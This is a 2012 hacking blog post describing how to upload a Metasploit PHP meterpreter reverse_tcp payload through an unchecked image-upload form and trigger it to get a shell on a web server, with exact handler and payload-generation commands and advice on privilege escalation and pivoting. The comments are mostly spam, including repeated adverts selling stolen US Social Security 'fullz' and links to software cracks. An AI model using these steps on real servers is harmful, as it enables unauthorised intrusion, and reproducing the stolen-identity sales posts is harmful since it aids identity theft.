Tuesday, April 3, 2012

Deploying payload via PHP

Another fun way to deploy our meterpreter payload is with php.

Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the filetype this can allow us to upload a php file including our payload, and then trick the server into executing it. Alternatively, this payload could be injected into a forum post or some such thing.

First thing we do, is start up a meterpreter handler using the PHP method, like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J


Now we create our meterpreter php payload file. This command will create the php payload, and save it as m.php
/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php



Now we simply upload our php script like we would with an image file.



Then we navigate a browser to the location that server usually hosts images, and click on the file we just uploaded.


The server runs our m.php, causing the server to connect to our meterpreter handler on the specified port, and give us a shell on the target server. In this case, the process is running as the apache user.




We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what all we've actually gained access to. Chances are that we have database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.

47 comments:

  1. hi how can i uploads my php file please

    ReplyDelete
    Replies
    1. Hello Everyone !

      USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

      All SSN's are Tested & Verified.

      **DETAILS IN LEADS/FULLZ**

      ->FULL NAME
      ->SSN
      ->DATE OF BIRTH
      ->DRIVING LICENSE NUMBER
      ->ADDRESS WITH ZIP
      ->PHONE NUMBER, EMAIL
      ->EMPLOYEE DETAILS

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If you buy in bulk, will give you discount
      *Sampling is just for serious buyers

      ->Hope for the long term business
      ->You can buy for your specific states too

      **Contact 24/7**

      Whatsapp > +923172721122

      Email > leads.sellers1212@gmail.com

      Telegram > @leadsupplier

      ICQ > 752822040

      Delete
    2. 7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download Now

      >>>>> Download Full

      7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download LINK

      >>>>> Download Now

      7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download Full

      >>>>> Download LINK Sm

      Delete
  2. The fellowship application personal statement is the best way to tell them what you are capable of, and our professionals know how to write you something that will get results.

    ReplyDelete
  3. Collections from the design labels such as Cheap TRX and other beauty are released after every six months.
    With every new launch, a new trx pas cher technology is developed.
    This had led to making trx pas cher remain competitive in the International market.
    The entire penny board hot sale packaging process is paid into detail to enhance the collections quality and appearance.
    Now everyone can own high-end designer Cheap TRX For Sale.
    cheap trx being one of the largest and most prominent fashion company in the world, it has an obligation of beating the standards set by others.
    The fashion world, with a higher concentration on trx france, needs to provide the best packaging services that the modern world has ever seen.
    cheap trx plays a major role in creating a brand name that fashion lovers want to identify with.

    ReplyDelete
  4. I appreciate your efforts because it conveys the message of what you are trying to say. It's a great skill to make even the person who doesn't know about the subject could able to understand the subject . Your blogs are understandable and also elaborately described. I hope to read more and more interesting articles from your blog. All the best.
    Devops Training courses
    Devops Training in Bangalore
    Best Devops Training in pune
    Microsoft azure training in Bangalore
    Power bi training in Chennai

    ReplyDelete
  5. Awesome..You have clearly explained …Its very useful for me to know about new things..Keep on blogging..
    python Training institute in Chennai
    python Training institute in Bangalore
    python Training in Pune

    ReplyDelete
  6. Thanks for your informative article, Your post helped me to understand the future and career prospects & Keep on updating your blog with such awesome article.
    python Training institute in Chennai
    python Training institute in Bangalore
    python Training in Pune

    ReplyDelete
  7. Attend The Python Training in Bangalore From ExcelR. Practical Python Training in Bangalore Sessions With Assured Placement Support From Experienced Faculty. ExcelR Offers The Python Training in Bangalore.

    ReplyDelete
  8. pmp certification india from ExcelR Bangalore.Here we deal the topics from scratch.

    ReplyDelete
  9. Enjoyed reading the article above, really explains everything in detail, the article is very interesting and effective. Thank you and good luck…

    Start your journey with SAP S4 HANA Simple Logistics Training and get hands-on Experience with 100% Placement assistance from experts Trainers @Softgen Infotech Located in BTM Layout Bangalore.

    ReplyDelete
  10. PMP Certification
    Took me time to understand all of the comments, but I seriously enjoyed the write-up. It proved being really helpful to me and Im positive to all of the commenters right here! Its constantly nice when you can not only be informed, but also entertained! I am certain you had enjoyable writing this write-up.

    ReplyDelete
  11. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  12. VISION AND EXECUTION. With a complete long term vision and its high capability to execute, Salesforce CRM Software claims the highest position in the Customer Relationship Management software market. The ability to execute this vision on ground has helped Salesforce reach the top.
    Salesforce Training in Chennai

    Salesforce Online Training in Chennai

    Salesforce Training in Bangalore

    Salesforce Training in Hyderabad

    Salesforce training in ameerpet

    Salesforce Training in Pune

    Salesforce Online Training

    Salesforce Training

    ReplyDelete
  13. Really very informative and creative contents. This concept is a good way to enhance the knowledge.thanks for sharing. please
    DevOps Training in Chennai

    DevOps Course in Chennai

    ReplyDelete
  14. Whats Happening i am new to this, I stumbled upon this I’ve discovered It absolutely helpful and it has aided me out loads. I am hoping to give a contribution & assist other users like its helped me. Great job. μ˜¨λΌμΈμΉ΄μ§€λ…Έ

    ReplyDelete
  15. Extremely overall quite fascinating post. I was searching for this sort of data and delighted in perusing this one. Continue posting. A debt of gratitude is in order for sharing.data scientist course in warangal


    ReplyDelete
  16. kadangpintar | Online Casino, Sports Betting, Bingo
    kadangpintar is a trusted online casino and sports betting website. All games λ©”λ¦¬νŠΈμΉ΄μ§€λ…Έ are avaliable. We provide our kadangpintar customers with free λ©”λ¦¬νŠΈ 카지노

    ReplyDelete
  17. Very nice article, I enjoyed reading your post, very nice share, I want to twit this to my followers. Thanks!. data science course in mysore

    ReplyDelete
  18. I adore your websites way of raising the awareness on your readers. data scientist course in surat

    ReplyDelete
  19. 7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download Now

    >>>>> Download Full

    7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download LINK

    >>>>> Download Now

    7 Habits Of Highly Effective Hackers: Deploying Payload Via Php >>>>> Download Full

    >>>>> Download LINK wO

    ReplyDelete
  20. 360DigiTMG is the top-ranked and the best Data Science Course Training Institute in Hyderabad..
    data analytics course in lucknow

    ReplyDelete
  21. I wanted to thank you for this exceptional recover!! I its total valued all minuscule piece. I have you ever bookmarked your site to try out the valuable possessions you announce. Zmodeler 3 License Crack

    ReplyDelete
  22. Most likely that is a very decent statement I were given a ton of information subsequent to dissecting powerful achievement. subject of blog is astonishing there might be a propos the whole to right of confirmation, splendid realm. Easeus Data Recovery Crack Key

    ReplyDelete
  23. I truly adored visiting your post and this content was very unique. Thanks a lot for sharing this...
    Spousal Support in VA
    Spousal Support in Virginia

    ReplyDelete
  24. Long fear it major production. Too she development national south. Strong option full audience management.technology

    ReplyDelete
  25. Action under option loss pretty would. System station know look.latest news headlines

    ReplyDelete
  26. This comment has been removed by the author.

    ReplyDelete
  27. I appreciate the emphasis on continuous learning and professional development in this article. Data Science Certification In Chennai

    ReplyDelete